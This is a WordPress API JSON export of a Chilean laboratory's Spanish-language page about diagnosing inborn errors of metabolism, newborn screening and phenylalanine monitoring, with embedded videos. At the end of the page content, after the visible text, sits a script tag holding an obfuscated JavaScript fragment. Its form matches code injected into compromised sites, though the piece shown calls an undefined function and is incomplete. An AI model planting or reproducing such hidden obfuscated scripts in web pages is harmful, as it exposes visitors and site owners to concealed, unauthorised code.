{"id":34,"date":"2020-02-11T22:02:55","date_gmt":"2020-02-12T01:02:55","guid":{"rendered":"http:\/\/metabolicaschile.cl\/new-site\/?page_id=34"},"modified":"2022-06-12T18:44:44","modified_gmt":"2022-06-12T22:44:44","slug":"labaratorio","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/labaratorio\/","title":{"rendered":"Laboratorio de enfermedades metab\u00f3licas"},"content":{"rendered":"\n<p class=\"text-justify\">Nuestro laboratorio tiene a disposici\u00f3n de los equipos de salud una serie de ensayos para la medici\u00f3n de metabolitos y actividades enzim\u00e1ticas para el diagn\u00f3stico y \u00f3ptimo seguimiento de los Errores Innatos del metabolismo.<\/p>\n\n\n\n<p class=\"text-justify\">Los EIM pueden ser pesquisados en forma preventiva en los primeros d\u00edas de edad, con la finalidad de llegar en forma temprana al diagn\u00f3stico y con esto evitar secuelas de la progresi\u00f3n de la enfermedad. A esta estrategia se le denomina Pesquisa Neonatal, la cual puede abarcar 1 o m\u00e1s patolog\u00edas, lo que est\u00e1 definido por el an\u00e1lisis que se aplique en un pa\u00eds o en un laboratorio.<\/p>\n\n\n\n<p class=\"text-justify\">Lo m\u00e1s habitual en pa\u00edses o regiones donde no se aplica un Programa de Pesquisa Neonatal o este abarca un n\u00famero reducido de patolog\u00edas, es que la estrategia diagn\u00f3stica sea reactiva, es decir cuando un m\u00e9dico al observar la sintomatolog\u00eda del paciente solicite ex\u00e1menes que confirmen la sospecha cl\u00ednica.<\/p>\n\n\n\n<p class=\"text-justify\">Nuestro Laboratorio est\u00e1 en permanente desarrollo, para dar respuesta a ambas estrategias diagn\u00f3sticas. Por esto es que nos hemos posicionado como referentes en Chile, recepcionando muestras de todas las regiones del pa\u00eds, para este tipo de an\u00e1lisis. As\u00ed tambi\u00e9n tenemos v\u00ednculo con MINSAL en el soporte del tratamiento nutricional de algunas de estas patolog\u00edas.<\/p>\n\n\n\n<h2>Misi\u00f3n<\/h2>\n\n\n\n<p>Diagn\u00f3stico de pacientes con EIM, ocupando t\u00e9cnicas de laboratorio cualitativas.<\/p>\n\n\n\n<h2>Visi\u00f3n<\/h2>\n\n\n\n<p>Entregar resultados de an\u00e1lisis altamente confiables, por lo que el aseguramiento de la calidad de nuestro trabajo es uno de nuestros pilares. <\/p>\n\n\n\n<h3>Conoce nuestro laboratorio<\/h3>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-vimeo wp-block-embed-vimeo wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" src=\"https:\/\/player.vimeo.com\/video\/463603830?h=aacfc4b369&amp;dnt=1&amp;app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<div class=\"wp-container-2 wp-block-columns\">\n<div class=\"wp-container-1 wp-block-column\"><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" width=\"1024\" height=\"177\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio-1024x177.png\" alt=\"\" class=\"wp-image-796\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio-1024x177.png 1024w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio-300x52.png 300w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio-768x133.png 768w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio-1536x265.png 1536w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Banner-Laboratorio.png 1610w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n<h2>Sector 1, Parte 1<\/h2>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-vimeo wp-block-embed-vimeo wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" src=\"https:\/\/player.vimeo.com\/video\/463608389?h=404a49acc8&amp;dnt=1&amp;app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<h2>Sector 1, Parte 2<\/h2>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-vimeo wp-block-embed-vimeo wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" src=\"https:\/\/player.vimeo.com\/video\/463626843?h=f53adee1cb&amp;dnt=1&amp;app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" width=\"800\" height=\"533\" class=\"wp-block-cover__image-background wp-image-455\" alt=\"\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/f157207-2-h-1.jpeg\" data-object-fit=\"cover\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/f157207-2-h-1.jpeg 800w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/f157207-2-h-1-300x200.jpeg 300w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/f157207-2-h-1-768x512.jpeg 768w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/02\/f157207-2-h-1-360x240.jpeg 360w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><div class=\"wp-block-cover__inner-container\">\n<h2 class=\"alignfull has-text-align-center has-white-color has-text-color has-large-font-size\"><strong> Revisa todos nuestros ex\u00e1menes ac\u00e1<\/strong><\/h2>\n\n\n\n<div class=\"wp-container-4 wp-block-columns\">\n<div class=\"wp-container-3 wp-block-column\"><div class=\"wp-block-image is-style-default style-button-shadow\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/cedinta.cl\/laboratorio\/enfermedades-metabolicas\/\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"422\" height=\"192\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Captura-de-Pantalla-2022-01-02-a-las-22.51.24.png\" alt=\"\" class=\"wp-image-228\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Captura-de-Pantalla-2022-01-02-a-las-22.51.24.png 422w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Captura-de-Pantalla-2022-01-02-a-las-22.51.24-300x136.png 300w\" sizes=\"(max-width: 422px) 100vw, 422px\" \/><\/a><\/figure><\/div><\/div>\n<\/div>\n<\/div><\/div>\n\n\n\n<div style=\"height:54px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-container-6 wp-block-columns\">\n<div class=\"wp-container-5 wp-block-column\">\n<p class=\"has-text-align-center\">&#8220;Nuestro Laboratorio, adem\u00e1s, dentro de sus principales funciones realiza la monitorizaci\u00f3n constante de Fenilalanina de los pacientes ya diagnosticados con Fenilquetonuria e hiperfenilalaninemia, ayudando en su tratamiento continuo ya que con esto se adec\u00faa la ingesta de macro y micronutrientes de acuerdo a su evoluci\u00f3n f\u00edsica y fisiopatol\u00f3gica.&#8221;<\/p>\n<\/div>\n<\/div>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Nuestro laboratorio tiene a disposici\u00f3n de los equipos de salud una serie de ensayos para la medici\u00f3n de metabolitos y actividades enzim\u00e1ticas para el diagn\u00f3stico y \u00f3ptimo seguimiento de los Errores Innatos del metabolismo. Los EIM pueden ser pesquisados en forma preventiva en los primeros d\u00edas de edad, con la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":204,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/template-fullwidth.php","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/34"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":62,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/34\/revisions"}],"predecessor-version":[{"id":1021,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/34\/revisions\/1021"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/204"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}